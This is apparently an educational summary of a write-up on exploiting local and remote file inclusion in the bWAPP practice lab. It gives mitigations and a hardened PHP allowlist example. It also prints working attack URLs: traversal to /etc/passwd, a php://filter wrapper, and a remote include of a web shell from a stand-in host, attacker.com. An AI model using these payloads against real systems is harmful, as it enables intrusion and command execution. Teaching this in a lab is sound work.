Detailed Technical Analysis of "RFI & LFI Exploitation on bWAPP"

Overview:
The write-up from Medium by crk2500 discusses exploiting Remote File Inclusion (RFI) and Local File Inclusion (LFI) vulnerabilities on the deliberately vulnerable web application bWAPP. Both vulnerabilities are critical as they can lead to severe consequences like code execution, sensitive data leakage, and other malicious actions.

Key Technical Details:

  1. Application Environment:

    • bWAPP Setup: bWAPP (Buggy Web Application) is used to demonstrate the exploitation techniques. It is a PHP-based application designed for security testing.
    • Lab Environment: A local machine hosts bWAPP, making it easy to control the target and to simulate real-world attack scenarios safely.

  2. Local File Inclusion (LFI):

    Basic LFI Example:

    • Vulnerable URL: http://[target]/bWAPP/rlfi.php?language=english.php
    • Traversal to /etc/passwd: http://[target]/bWAPP/rlfi.php?language=../../../../etc/passwd
    • Explanation: The language parameter is not validated before it is handed to include, so directory traversal sequences let an attacker read any file the web server user can access.
    • Technical Insight: Each ../ steps one directory up; once the path has climbed to the filesystem root, appending etc/passwd makes the application read the passwd file of the Unix-based system, disclosing its user account details.

    PHP Wrappers for LFI:

    • Example URL: http://[target]/bWAPP/rlfi.php?language=php://filter/convert.base64-encode/resource=../../../../etc/passwd
    • Explanation: Using PHP stream wrappers, the attacker has the server Base64-encode the file's content before returning it, which can slip past naive filters and delivers binary or source files without corruption.
    • Technical Insight: The php://filter wrapper applies a transformation to the stream while it is read. Base64-encoding the output keeps the content intact where non-ASCII bytes might otherwise be scrambled, and for a .php file it means the source is returned as text instead of being executed by the include.

  3. Remote File Inclusion (RFI):

    Basic RFI Example:

    • Vulnerable URL: http://[target]/bWAPP/rlfi.php?language=http://attacker.com/shell.txt
    • Explanation: The same language parameter is used to include a script hosted on an attacker-controlled server, leading to remote code execution.
    • Technical Insight: RFI is possible because the server passes a user-supplied URL straight to include, so PHP fetches the remote file and executes whatever PHP code it contains (here shell.txt) in the web server's context. This only works when allow_url_include is enabled.

    In-depth RFI Scenario:

    • Crafting the Payload: The attacker hosts shell.txt containing PHP code such as <?php system($_GET['cmd']); ?>.
    • URL to include: http://[target]/bWAPP/rlfi.php?language=http://attacker.com/shell.txt&cmd=whoami
    • Explanation: Including the remote script and supplying the cmd parameter executes operating-system commands on the server.
    • Technical Insight: This scenario shows how a remote file inclusion turns user-supplied input into server-side command execution, often ending in complete system compromise when the web server process runs with more privileges than it needs.

  4. Mitigation Strategies:

    • Input Validation: Always validate user input. Use a whitelist (allowlist) of expected values for file inclusion parameters and map each accepted value to a fixed file name on the server; never build an include path from the raw parameter.
    • Configuration Best Practices: Set allow_url_include to Off in the php.ini configuration file (it is Off by default in current PHP releases) to blunt RFI. Note that this setting does nothing against LFI, which needs the validation above.
    • Least Privilege Principle: Run the web server and PHP with the minimum permissions they need, so that a successful LFI or RFI can read or execute as little as possible.
    • PHP Configuration: Set open_basedir to confine PHP's file access to designated directories, reducing the impact of LFI. It limits which files can be reached but does not fix the vulnerable include itself.
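The allowlist mitigation above, as an added example that is not code from the write-up or from bWAPP: a hardened replacement for a language-include endpoint like rlfi.php. The languages/ directory, the file names in the map and the resolveLanguageFile function are assumptions.

```php
<?php
// Added example (not bWAPP's code): hardened include for a "language" parameter.
// The vulnerable pattern this replaces is, in effect:  include $_GET['language'];
// The languages/ directory and the two file names below are assumptions.
declare(strict_types=1);

// Allowlist: request values map to fixed file names chosen by the developer.
// The request never supplies a path, so ../, php://filter and http:// never
// reach include().
const LANGUAGE_FILES = [
    'english' => 'english.php',
    'french'  => 'french.php',
];

/**
 * Return the canonical path of the allowed language file, or null when the
 * requested value is not allowlisted or resolves outside $baseDir.
 */
function resolveLanguageFile(string $requested, string $baseDir): ?string
{
    if (!array_key_exists($requested, LANGUAGE_FILES)) {
        return null;                       // unknown value: refuse, do not guess
    }
    $base = realpath($baseDir);
    $real = realpath($baseDir . DIRECTORY_SEPARATOR . LANGUAGE_FILES[$requested]);
    if ($base === false || $real === false) {
        return null;                       // directory or file missing
    }
    // Defence in depth: even an allowlisted entry must stay under $baseDir.
    // This is the same containment that open_basedir enforces globally.
    if (strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $real;
}

$requested = $_GET['language'] ?? 'english';
if (!is_string($requested)) {              // language[]=... arrives as an array
    $requested = '';
}
$file = resolveLanguageFile($requested, __DIR__ . '/languages');
if ($file === null) {
    http_response_code(400);
    exit('Unknown language');
}
include $file;
// Pair this with php.ini: allow_url_include = Off and an open_basedir limited
// to the application directory, as listed under Mitigation Strategies.
```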

Conclusion:

The write-up emphasizes the importance of understanding and mitigating file inclusion vulnerabilities. Practicing secure coding and configuration hygiene is crucial in defending against such attacks, which can lead to significant security breaches. The lab and examples in the write-up serve as a valuable educational resource for budding security professionals.

For full details, check the original write-up here.